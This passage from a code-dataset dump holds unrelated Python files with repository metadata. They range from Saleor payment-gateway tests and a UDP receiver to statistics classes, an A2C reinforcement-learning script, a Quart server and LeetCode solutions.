mock_handle_fully_paid_order.called\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture_failed(\n        mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n        gateway_params):\n    txn = payment_txn_preauth.transactions.first()\n    txn.is_success = False\n\n    payment = payment_txn_preauth\n    amount = payment.total\n\n    mock_capture = Mock(return_value=(txn, EXAMPLE_ERROR))\n    mock_get_payment_gateway.return_value = (\n        Mock(capture=mock_capture), gateway_params)\n    with pytest.raises(PaymentError) as exc:\n        gateway_capture(payment, amount)\n    assert exc.value.message == EXAMPLE_ERROR\n    payment.refresh_from_db()\n    assert payment.charge_status == ChargeStatus.NOT_CHARGED\n    assert not payment.captured_amount\n    assert not mock_handle_fully_paid_order.called\n\n\ndef test_gateway_capture_errors(payment_dummy):\n    with pytest.raises(PaymentError) as exc:\n        gateway_capture(payment_dummy, Decimal('0'))\n    assert exc.value.message == 'Amount should be a positive number.'\n\n    payment_dummy.charge_status = ChargeStatus.FULLY_REFUNDED\n    with pytest.raises(PaymentError) as exc:\n        gateway_capture(payment_dummy, Decimal('10'))\n    assert exc.value.message == 'This payment cannot be captured.'\n\n    payment_dummy.charge_status = ChargeStatus.NOT_CHARGED\n    with pytest.raises(PaymentError) as exc:\n        gateway_capture(payment_dummy, Decimal('1000000'))\n    assert exc.value.message == (\n        'Unable to capture more than authorized amount.')\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_void(mock_get_payment_gateway, payment_txn_preauth, gateway_params):\n    txn = payment_txn_preauth.transactions.first()\n    payment = payment_txn_preauth\n    assert payment.is_active\n\n    mock_void = Mock(return_value=(txn, ''))\n    mock_get_payment_gateway.return_value = (Mock(void=mock_void), gateway_params)\n\n    gateway_void(payment)\n    mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n    mock_void.assert_called_once_with(payment=payment, **gateway_params)\n\n    payment.refresh_from_db()\n    assert not payment.is_active\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_void_failed(\n        mock_get_payment_gateway, payment_txn_preauth, gateway_params):\n    txn = payment_txn_preauth.transactions.first()\n    txn.is_success = False\n    payment = payment_txn_preauth\n\n    mock_void = Mock(return_value=(txn, EXAMPLE_ERROR))\n    mock_get_payment_gateway.return_value = (Mock(void=mock_void), gateway_params)\n    with pytest.raises(PaymentError) as exc:\n        gateway_void(payment)\n    assert exc.value.message == EXAMPLE_ERROR\n\n    payment.refresh_from_db()\n    assert payment.is_active\n\n\ndef test_gateway_void_errors(payment_dummy):\n    payment_dummy.charge_status = ChargeStatus.CHARGED\n    with pytest.raises(PaymentError) as exc:\n        gateway_void(payment_dummy)\n    assert exc.value.message == 'Only pre-authorized transactions can be voided.'\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund(\n        mock_get_payment_gateway, payment_txn_captured, gateway_params):\n    txn = payment_txn_captured.transactions.first()\n    payment = payment_txn_captured\n    amount = payment.total\n\n    mock_refund = Mock(return_value=(txn, ''))\n    mock_get_payment_gateway.return_value = (\n        Mock(refund=mock_refund), gateway_params)\n\n    gateway_refund(payment, amount)\n    mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n    mock_refund.assert_called_once_with(\n        payment=payment, amount=amount, **gateway_params)\n\n    
payment.refresh_from_db()\n    assert payment.charge_status == ChargeStatus.FULLY_REFUNDED\n    assert not payment.captured_amount\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund_partial_refund(\n        mock_get_payment_gateway, payment_txn_captured, gateway_params, settings):\n    payment = payment_txn_captured\n    amount = payment.total * Decimal('0.5')\n    txn = payment_txn_captured.transactions.first()\n    txn.amount = amount\n    txn.currency = settings.DEFAULT_CURRENCY\n\n    mock_refund = Mock(return_value=(txn, ''))\n    mock_get_payment_gateway.return_value = (\n        Mock(refund=mock_refund), gateway_params)\n\n    gateway_refund(payment, amount)\n\n    payment.refresh_from_db()\n    assert payment.charge_status == ChargeStatus.CHARGED\n    assert payment.captured_amount == payment.total - amount\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund_failed(\n        mock_get_payment_gateway, payment_txn_captured, gateway_params, settings):\n    txn = payment_txn_captured.transactions.first()\n    payment = payment_txn_captured\n    captured_before = payment.captured_amount\n    txn.is_success = False\n\n    mock_refund = Mock(return_value=(txn, EXAMPLE_ERROR))\n    mock_get_payment_gateway.return_value = (\n        Mock(refund=mock_refund), gateway_params)\n\n    with pytest.raises(PaymentError) as exc:\n        gateway_refund(payment, Decimal('10.00'))\n    assert exc.value.message == EXAMPLE_ERROR\n    payment.refresh_from_db()\n    assert payment.captured_amount == captured_before\n\n\ndef test_gateway_refund_errors(payment_txn_captured):\n    payment = payment_txn_captured\n    with pytest.raises(PaymentError) as exc:\n        gateway_refund(payment, Decimal('1000000'))\n    assert exc.value.message == 'Cannot refund more than captured'\n\n    with pytest.raises(PaymentError) as exc:\n        gateway_refund(payment, Decimal('0'))\n    assert exc.value.message == 'Amount should be a positive number.'\n\n    payment.charge_status = ChargeStatus.NOT_CHARGED\n    with pytest.raises(PaymentError) as exc:\n        gateway_refund(payment, Decimal('1'))\n    assert exc.value.message == 'This payment cannot be refunded.'\n\n\n@pytest.mark.parametrize('gateway_name', settings.PAYMENT_GATEWAYS.keys())\ndef test_payment_gateway_templates_exists(gateway_name):\n    \"\"\"Test if for each payment gateway there's a corresponding\n    template for the old checkout.\n    \"\"\"\n    template = PAYMENT_TEMPLATE % gateway_name\n    get_template(template)\n\n\n@pytest.mark.parametrize('gateway_name', settings.PAYMENT_GATEWAYS.keys())\ndef test_payment_gateway_form_exists(gateway_name, payment_dummy):\n    \"\"\"Test if for each payment gateway there's a corresponding\n    form for the old checkout.\n\n    An error will be raised if it's missing.\n    \"\"\"\n    payment_gateway, gateway_params = get_payment_gateway(\n        gateway_name)\n    payment_gateway.get_form_class()\n\n\ndef test_clean_authorize():\n    payment = Mock(can_authorize=Mock(return_value=True))\n    clean_authorize(payment)\n\n    payment = Mock(can_authorize=Mock(return_value=False))\n    with pytest.raises(PaymentError):\n        clean_authorize(payment)\n\n\ndef test_clean_capture():\n    # Amount should be a positive number\n    payment = Mock()\n    amount = Decimal('0.00')\n    with pytest.raises(PaymentError):\n        clean_capture(payment, amount)\n\n    # Payment cannot be captured\n    payment = Mock(can_capture=Mock(return_value=False))\n    amount = Decimal('1.00')\n    with pytest.raises(PaymentError):\n        clean_capture(payment, amount)\n\n    # Amount is larger than payment's total\n    payment = Mock(\n        can_capture=Mock(return_value=True),\n        total=Decimal('1.00'),\n        
captured_amount=Decimal('0.00'))\n amount = Decimal('2.00')\n with pytest.raises(PaymentError):\n clean_capture(payment, amount)\n\n amount = Decimal('2.00')\n payment = Mock(\n can_capture=Mock(return_value=True),\n total=amount,\n captured_amount=Decimal('0.00'))\n clean_capture(payment, amount)\n\n\ndef test_can_authorize(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_authorize()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_authorize()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert not payment_dummy.can_authorize()\n\n\ndef test_can_capture(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_capture()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_capture()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_capture()\n\n payment_dummy.captured_amount = payment_dummy.total\n assert not payment_dummy.can_capture()\n\n\ndef test_can_charge(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_charge()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_charge()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_charge()\n\n payment_dummy.captured_amount = payment_dummy.total\n assert not payment_dummy.can_charge()\n\n\ndef test_can_void(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_void()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_void()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert not payment_dummy.can_void()\n\n\ndef test_can_refund(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_refund()\n\n payment_dummy.is_active = True\n assert not payment_dummy.can_refund()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_refund()\n\n\ndef test_payment_get_authorized_amount(payment_txn_preauth):\n authorized_amount = payment_txn_preauth.transactions.first().amount\n assert payment_txn_preauth.get_authorized_amount().amount == \\\n authorized_amount\n assert payment_txn_preauth.order.total_authorized.amount == \\\n authorized_amount\n\n\n payment_txn_preauth.transactions.all().delete()\n assert payment_txn_preauth.get_authorized_amount().amount == Decimal(0)\n","repo_name":"Kenstogram/opensale","sub_path":"tests/test_payment.py","file_name":"test_payment.py","file_ext":"py","file_size_in_byte":20118,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"74034398245","text":"import sys\nfrom socket import *\nimport zlib\n\ndef split_packet(packet):\n checksum = int.from_bytes(packet[:4], 'big')\n seq_ack = int.from_bytes(packet[4:5], 'big')\n data = packet[5:].decode()\n return checksum, seq_ack, data\n\ndef create_ack(seq_num):\n packet = seq_num.to_bytes(1, 'big')\n checksum = zlib.crc32(packet).to_bytes(4, 'big')\n packet = checksum + packet\n return packet\n\ndef check_packet(packet):\n expected_checksum = int.from_bytes(packet[:4], 'big')\n actual_checksum = zlib.crc32(packet[4:])\n return expected_checksum == 
actual_checksum\n\ndef Bob():\n\n    serverPort = int(sys.argv[1])\n    serverSocket = socket(AF_INET, SOCK_DGRAM)\n    serverSocket.bind(('', serverPort))\n    expected_seq_num = 0\n\n    while True:\n        # receive packet\n        received_packet, clientAddress = serverSocket.recvfrom(64)\n        \n        # check if packet corrupted\n        if check_packet(received_packet):\n            checksum, seq_num, data = split_packet(received_packet)\n            \n            #check if seq num matches expected seq num\n            if seq_num == expected_seq_num:\n                print(data, end = \"\")\n                expected_seq_num = 1 - seq_num\n            \n            # send out ack_packet\n            ack_packet = create_ack(seq_num)\n            serverSocket.sendto(ack_packet, clientAddress)\n\n    serverSocket.close()\n\nif __name__ == \"__main__\":\n    Bob()\n","repo_name":"bryanongjx/CS2105-Assignments","sub_path":"Assignment2/Bob.py","file_name":"Bob.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"11659440537","text":"import math\nfrom abc import ABC, abstractmethod\nfrom statistics import mean\n\n\nclass EqualityMeansAndVarianceTwoSamples(ABC):\n    def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n        self.data_x: list[float] = data_x\n        self.data_y: list[float] = data_y\n\n        self.t_a: float = t_a  # quantile of Student's t distribution\n        self.f_a: float = f_a  # quantile of the Fisher (F) distribution\n\n        self.x_average: float | None = None\n        self.y_average: float | None = None\n\n        self.S2__x: float | None = None\n        self.S2__y: float | None = None\n\n        self.t: float | None = None\n        self.f: float | None = None\n\n        self.calculation()\n\n    @abstractmethod\n    def calculate_t(self) -> float:\n        pass\n\n    @abstractmethod\n    def calculate_f(self) -> float:\n        pass\n\n    def calculation(self):\n        self.x_average = mean(self.data_x)\n        self.y_average = mean(self.data_y)\n\n        self.S2__x = self.get_variance(self.data_x, self.x_average)\n        self.S2__y = self.get_variance(self.data_y, self.y_average)\n\n        self.t = self.calculate_t()\n        self.f = self.calculate_f()\n\n    @staticmethod\n    def sum_div(data: list[float], average: float, degree: int) -> float:\n        return sum(math.pow(i - average, degree) for i in data)\n\n    def get_variance(self, data: list[float], average: float, degree: int = 2, shifted: bool = True) -> float:\n        return self.sum_div(data, average, degree) / (len(data) - (0 if shifted else 1))\n\n    def get_result(self) -> str:\n        result = \"\"\n        if abs(self.t) <= self.t_a:\n            result += \"The hypothesis of equal population means is confirmed!\\n\"\n        else:\n            result += \"The means differ significantly\\n\"\n\n        if self.f <= self.f_a:\n            result += \"The population variances coincide!\\n\"\n        else:\n            result += \"The population variances differ!\\n\"\n\n        return result\n\n\nclass DependentEqualityMeansAndVarianceTwoSamples(EqualityMeansAndVarianceTwoSamples):\n    \"\"\"Testing equality of means and variances for two DEPENDENT samples.\"\"\"\n\n    def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n        self.data_z: list[float] = [x - y for x, y in zip(data_x, data_y)]\n\n        self.N: int = len(self.data_z)\n        self.z_average: float | None = None\n        self.S__z: float | None = None\n\n        super().__init__(data_x, data_y, t_a, f_a)\n\n    def calculation(self):\n        self.z_average = mean(self.data_z)\n        self.S__z = math.pow(\n            self.get_variance(self.data_z, self.z_average),\n            1 / 2\n        )\n        super().calculation()\n\n    def calculate_t(self) -> float:\n        return (self.z_average * math.pow(self.N, 1 / 
2)) / self.S__z\n\n    def calculate_f(self) -> float:\n        return self.S2__x / self.S2__y if self.S2__x >= self.S2__y else self.S2__y / self.S2__x\n\n    def __str__(self):\n        return f\"\"\"Testing equality of means and variances for two DEPENDENT samples: t={self.t}, f={self.f}\"\"\"\n\n\nclass IndependentEqualityMeansAndVarianceTwoSamples(EqualityMeansAndVarianceTwoSamples):\n    \"\"\"Testing equality of means and variances for two INDEPENDENT samples.\"\"\"\n\n    def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n        self.N_x: int = len(data_x)\n        self.N_y: int = len(data_y)\n\n        super().__init__(data_x, data_y, t_a, f_a)\n\n    def calculate_t(self) -> float:\n        # pooled variance: the whole weighted sum is divided by (N_x + N_y - 2)\n        s = ((self.N_x - 1) * self.S2__x + (self.N_y - 1) * self.S2__y) / (self.N_x + self.N_y - 2)\n        return (self.x_average - self.y_average) / math.pow((s / self.N_x) + (s / self.N_y), 1 / 2)\n\n    def calculate_f(self) -> float:\n        return self.S2__x / self.S2__y if self.S2__x >= self.S2__y else self.S2__y / self.S2__x\n\n    def __str__(self):\n        return f\"\"\"Testing equality of means and variances for two INDEPENDENT samples: t={self.t}, f={self.f}\"\"\"\n\n\nif __name__ == '__main__':\n    from data import (\n        DATA_DEP_4_7_1, DATA_DEP_4_7_2,\n        DATA_INDEP_4_7_1, DATA_INDEP_4_7_2\n    )\n\n    d = DependentEqualityMeansAndVarianceTwoSamples(DATA_DEP_4_7_1, DATA_DEP_4_7_2)\n    print(d)\n    print(d.get_result())\n    print('-' * 100)\n    i = IndependentEqualityMeansAndVarianceTwoSamples(DATA_INDEP_4_7_1, DATA_INDEP_4_7_2)\n    print(i)\n    print(i.get_result())","repo_name":"Grayder0152/Univer","sub_path":"analize/pr_4_5.py","file_name":"pr_4_5.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"12334600948","text":"import unittest\nfrom async_url import fetch_url\nfrom unittest.mock import AsyncMock\n\n\nclass TestAsyncURLs(unittest.IsolatedAsyncioTestCase):\n    async def test_fetch_url(self):\n        my_mock = AsyncMock()\n        my_mock.return_value = \"Abcd Efgh\"\n        r = my_mock()\n        awaited_result = await r\n        res = len(awaited_result)\n        self.assertEqual(res, len(await my_mock()))\n\n    async def test_fetch_url_mock_generator(self):\n        expected_values = [\"12345\", \"some string\", \"7*7=49\"]\n        my_mock_generator = AsyncMock()\n        my_mock_generator.__aiter__.return_value = expected_values\n\n        actual_values = []\n        async for value in my_mock_generator:\n            actual_values.append(len(value))\n        expected_values_len = [len(i) for i in expected_values]\n        self.assertListEqual(expected_values_len, actual_values)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"maikdonut/made_python_course","sub_path":"advance_06/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29971214727","text":"import datetime\n\nfrom .device_infos import DeviceInfos\n\n\n# --------------------------------------------------------------------------------\nclass MidPointTemp:\n    @staticmethod\n    def midpoint_temp_for_month(\n        calculation_moment: datetime.datetime,\n        device_infos: DeviceInfos,\n    ) -> float:\n        # Magic numbers for polynomial using UK mid-point historic temps\n\n        month = calculation_moment.month\n        # Equation for Goole, United Kingdom: https://www.metoffice.gov.uk/research/climate/maps-and-data/uk-climate-averages/gcx4kb837\n        return (0.0019 * month**5) + (-0.04973 * month**4) + (0.37424 * month**3) - (0.64667 * 
month**2) + (0.43078 * month) + 3.86\n","repo_name":"MyForest/heatpump-act","sub_path":"act/midpoint_temp.py","file_name":"midpoint_temp.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"3664676971","text":"\n\ndef draw_board(grid):\n    board = (f\"|{grid[1]}|{grid[2]}|{grid[3]}|\\n\"\n             f\"|{grid[4]}|{grid[5]}|{grid[6]}|\\n\"\n             f\"|{grid[7]}|{grid[8]}|{grid[9]}|\")\n    print(board)\n\ndef check_turn(turn):\n    return 'O' if not (turn % 2) else 'X'\n\n\ndef check_for_win(grid):\n    if (grid[1] == grid[2] == grid[3]) \\\n    or (grid[4] == grid[5] == grid[6]) \\\n    or (grid[7] == grid[8] == grid[9]):\n        return True\n    if (grid[1] == grid[4] == grid[7]) \\\n    or (grid[2] == grid[5] == grid[8]) \\\n    or (grid[3] == grid[6] == grid[9]):\n        return True\n    if (grid[1] == grid[5] == grid[9]) \\\n    or (grid[3] == grid[5] == grid[7]):\n        return True\n    return False\n","repo_name":"SA-GutHub/python-tic-tac-toe","sub_path":"tic tac toe/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"38907260225","text":"import magic\nimport glob\nimport hashlib\nfilenames = glob.glob(\"Dokaz_4/*\")\nchallenge = \"c15e32d27635f248c1c8b66bb012850e5b342119\"\n\nfor filename in filenames:\n    with open(filename, \"rb\") as inputfile:\n        data = inputfile.read()\n        if hashlib.sha1(data).hexdigest() == challenge:\n            print(filename, magic.from_file(filename))\n            break\n\n","repo_name":"aradacic/forenzika","sub_path":"lab2/lab24.py","file_name":"lab24.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70274669285","text":"# A2C\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport time\nimport gym\n\ngamma = 0.95\nlr = 0.001\nhidden_state = 20\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"using device: \", device)\n\n\ndef weight_init(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv2d') != -1:\n        torch.nn.init.normal_(m.weight.data, 0, 0.1)\n        torch.nn.init.constant_(m.bias.data, 0.0)\n    elif classname.find('Linear') != -1:\n        torch.nn.init.normal_(m.weight)\n        torch.nn.init.constant_(m.bias, 0.0)\n    elif classname.find('BatchNorm2d') != -1:\n        torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\n        torch.nn.init.constant_(m.bias.data, 0.0)\n\n\nclass MLP(nn.Module):\n    def __init__(self, state_dim, action_state):\n        super(MLP, self).__init__()\n        self.fc1 = nn.Linear(state_dim, hidden_state)\n        self.fc2 = nn.Linear(hidden_state, action_state)\n        self.relu = nn.ReLU()\n\n    def forward(self, x):\n        x = self.fc1(x)\n        x = self.relu(x)\n        x = self.fc2(x)\n        return x\n\n\nclass Actor(object):\n    def __init__(self, env):\n        self.state_dim = env.observation_space.shape[0]\n        self.action_dim = env.action_space.n\n\n        # keep the policy network on the same device as its input tensors\n        self.network = MLP(self.state_dim, self.action_dim).to(device)\n        self.optimizer = torch.optim.SGD(self.network.parameters(), lr=lr)\n\n        self.time_step = 0\n\n    def choose_action(self, observation):\n        observation = torch.FloatTensor(observation).to(device)\n        network_output = self.network.forward(observation)  # [action_dim, ]\n        with torch.no_grad():\n            prob_weights = F.softmax(network_output, dim=0).data.cpu().numpy()\n        action = np.random.choice(range(prob_weights.shape[0]), p=prob_weights)\n        return action\n\n    def learn(self, state, 
action, td_error):\n        self.time_step += 1\n        # forward\n        softmax_input = self.network.forward(torch.FloatTensor(state).to(device)).unsqueeze(0)\n        action = torch.LongTensor([action]).to(device)\n        neg_log_prob = F.cross_entropy(input=softmax_input, target=action, reduction=\"none\")\n        # backward: minimizing (-log pi) * td_error raises the probability of\n        # actions whose TD error (advantage) is positive\n        loss = neg_log_prob * td_error\n        self.optimizer.zero_grad()\n        loss.backward()\n        self.optimizer.step()\n\n\nEpsilon = 0.01\nEpisode = 1000\nSteps = 300\nReplay_size = 10000\nTests = 10\nBatch_size = 32\nReplay_target_freq = 10  # frequency to update target Q network\ngame = 'CartPole-v0'\n\n\nclass Critic(nn.Module):\n    def __init__(self, env):\n        super(Critic, self).__init__()\n        self.state_dim = env.observation_space.shape[0]\n        self.action_dim = 1\n\n        self.network = MLP(self.state_dim, self.action_dim).to(device)\n        self.optimizer = torch.optim.SGD(self.network.parameters(), lr=lr)\n        self.criterion = nn.MSELoss()\n\n        self.time_step = 0\n        self.epsilon = Epsilon\n\n    def train_Q_network(self, state, reward, next_state):\n        s, s_ = torch.FloatTensor(state).to(device), torch.FloatTensor(next_state).to(device)\n\n        # forward\n        v = self.network.forward(s)\n        v_ = self.network.forward(s_)\n\n        # backward: the bootstrap target is a constant, so detach it from the graph\n        loss = self.criterion(reward + gamma * v_.detach(), v)\n        self.optimizer.zero_grad()\n        loss.backward()\n        self.optimizer.step()\n\n        with torch.no_grad():\n            td_error = reward + gamma * v_ - v\n        return td_error\n\n\ndef train():\n    env = gym.make(game)\n    actor = Actor(env)\n    critic = Critic(env)\n\n    for episode in range(Episode):\n        state = env.reset()\n        for step in range(Steps):\n            action = actor.choose_action(state)\n            next_state, reward, done, _ = env.step(action)\n            td_error = critic.train_Q_network(state, reward, next_state)\n            actor.learn(state, action, td_error)\n            state = next_state\n            if done:\n                break\n\n        if episode % 100 == 0:\n            total_reward = 0\n            for i in range(Tests):\n                state = env.reset()\n                for j in range(Steps):\n                    action = actor.choose_action(state)\n                    state, reward, done, _ = env.step(action)\n                    total_reward += reward\n                    if done:\n                        break\n            avg_reward = total_reward / Tests\n            print(\"Episode:{}, Average Reward:{}\".format(episode, avg_reward))\n\n\nif __name__ == \"__main__\":\n    train()\n","repo_name":"JackeyLove1/Leetcode","sub_path":"python/ML/RL/A2C.py","file_name":"A2C.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
{"seq_id":"41778662886","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 1 18:31:40 2023\r\n\r\n@author: Amalu Vincent\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read data from file and store in array\r\ndata = np.loadtxt('data4.csv')\r\nfig = plt.figure(figsize=(8,5))\r\n# Create histogram of newborn weights\r\nn, bins, patches = plt.hist(data, bins=20,color='coral', edgecolor='white',alpha=0.7)\r\n# Calculate average weight\r\nW_mean = np.mean(data)\r\n# Calculate fraction of babies born with weight between 0.9W and 1.1W\r\nW_09 = 0.9 * W_mean\r\nW_11 = 1.1 * W_mean\r\nn_09_11 = sum((W_09 <= data) & (data <= W_11)) / len(data)\r\n\r\n# Plot X and W values on histogram\r\nplt.axvline(x=W_mean, color='black',linestyle='--', label='Average weight')\r\nplt.axvspan(W_09, W_11, alpha=0.3, color='g', label='0.9W to 1.1W')\r\nplt.legend()\r\nplt.xlabel('Newborn weight (kg)',fontweight='bold')\r\nplt.ylabel('Frequency', fontweight='bold')\r\nplt.title('Distribution Of Newborn Weights', fontweight='bold')\r\n\r\n\r\n# Print values on graph\r\nplt.text(0.05, 0.9, 
f'Average weight (W) = {W_mean:.2f} kg\\n', \r\n         transform=plt.gca().transAxes)\r\nplt.text(0.05, 0.8, f'Fraction of babies between \\n 0.9W and 1.1W (X) = {n_09_11:.2%}',\r\n         transform=plt.gca().transAxes)\r\nplt.savefig('histogram.png')\r\nplt.show()\r\n","repo_name":"amaluvincent/coding-project","sub_path":"22026244.py.py","file_name":"22026244.py.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"17878567115","text":"import re\nfrom bs4 import BeautifulSoup\n\nhtml = \"\"\"\n\n\"\"\"\nsoup = BeautifulSoup(html, 'lxml')\n# The text parameter matches the text of nodes; it accepts either a plain string\n# or a compiled regular expression object\nprint(soup.find_all(text=re.compile('link')))","repo_name":"JasonSam1996/Python3CrawlerDemo","sub_path":"4_2/soup11.py","file_name":"soup11.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"28160185499","text":"# -*- coding: utf-8 -*-\ndef canJump(nums: list) -> bool:\n    bound = len(nums) - 1\n    \n    for i in range(len(nums)-2, -1, -1):\n        if nums[i] >= bound - i:\n            bound = i\n    \n    return bound == 0\n\n\n\nif __name__ == \"__main__\":\n    nums = [2, 3, 1, 1, 4]\n    print(canJump(nums))  # True: index 0 can reach the last index\n    nums = [3, 2, 1, 0, 4]\n    print(canJump(nums))  # False: every path gets stuck at index 3\n","repo_name":"Lukaschen1986/LeetCodeProgress","sub_path":"dp/55_canJump.py","file_name":"55_canJump.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27331603627","text":"# quart_hosted.py\nfrom quart import Quart\n\napp = Quart(__name__)\n\n\n@app.route(\"/api\")\nasync def my_get_handler():\n    return {\"Hello\": \"World!\"}\n\n\n@app.route(\"/api_post\", methods=[\"POST\"])\nasync def my_post_handler():\n    return \"ok\", 200\n\n\nif __name__ == \"__main__\":\n    app.run(host=\"REPLACE WITH YOUR IP ADDRESS\")\n","repo_name":"PacktPublishing/Python-Microservices-Development-2nd-Edition","sub_path":"CodeSamples/Chapter5/quart_hosted.py","file_name":"quart_hosted.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"}
{"seq_id":"6131600825","text":"import sys\n\n###################################################################################\n# Takes a txt file from the apply grad dump for a program (such as MIIS, MCDS,\n# and MSAII) and creates a csv, which can be loaded by pandas. 
Renames\n# duplicate column names with \"_N\" so that each column has a unique name.\n###################################################################################\ndef format_csv(input_file):\n    output_file_name = input_file.split('.')[0] + '.csv'\n    output_file = open(output_file_name, 'w', encoding=\"utf-8\", errors='ignore')\n    is_header = True\n    header_list = []\n    header_duplicate_dict = {}\n    linenum = 1\n    with open(input_file, 'r', encoding='utf-8') as f:\n        for line in f:\n            line = line.replace('\"', '')\n            linenum += 1\n            line_parts = line.split('^')\n            if is_header:\n                for header_name in line_parts:\n                    if header_name in header_list:\n                        header_duplicate_dict[header_name] = header_duplicate_dict.get(header_name, 1) + 1\n                        header_name = header_name + '_' + str(header_duplicate_dict[header_name])\n                    header_list.append(header_name)\n                new_string = ','.join(map(lambda x: \"\\\"\" + x.strip() + \"\\\"\", header_list))\n                is_header = False\n            else:\n                new_string = ','.join(map(lambda x: \"\\\"\" + x.strip() + \"\\\"\", line_parts))\n            #print(new_string)\n            output_file.write(new_string)\n            output_file.write('\\n')\n            output_file.flush()\n    output_file.close()\n\nif __name__ == '__main__':\n    input_file = sys.argv[1]\n    format_csv(input_file)","repo_name":"CMU-Language-Technologies-Institute/LTIAdmissions","sub_path":"format_applygrad_csv.py","file_name":"format_applygrad_csv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37217563631","text":"#\n# @lc app=leetcode id=113 lang=python3\n#\n# [113] Path Sum II\n#\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\n# method 1\n# Edge cases return a flat list, which the loop below skips; the normal case\n# returns a list of paths, each of which gets extended and appended automatically\n# class Solution:\n#     def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n#         if not root:\n#             return []\n#         if (not root.left and not root.right) and (root.val==sum):\n#             return [[root.val]]\n#         if not root.left and not root.right:\n#             return []\n#         res = []\n#         for val in self.pathSum(root.left, sum-root.val):\n#             res.append([root.val]+val)\n#         for val in self.pathSum(root.right, sum-root.val):\n#             res.append([root.val]+val)\n#         return res\n# method 2 (surprisingly) uses a queue: breadth-first traversal, recording each\n# node, its running sum and its path in the queue; a (node, sum, path) triple\n# neatly avoids duplicated records or lost information\nclass Solution:\n    def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n        if not root:\n            return []\n        res = []\n        queue = [(root, root.val, [root.val])]\n        while queue:\n            cur, val, ls = queue.pop(0)\n            if not cur.left and not cur.right and val==sum:\n                res.append(ls)\n            if cur.left:\n                queue.append((cur.left, val+cur.left.val, ls+[cur.left.val]))\n            if cur.right:\n                queue.append((cur.right, val+cur.right.val, ls+[cur.right.val]))\n        return 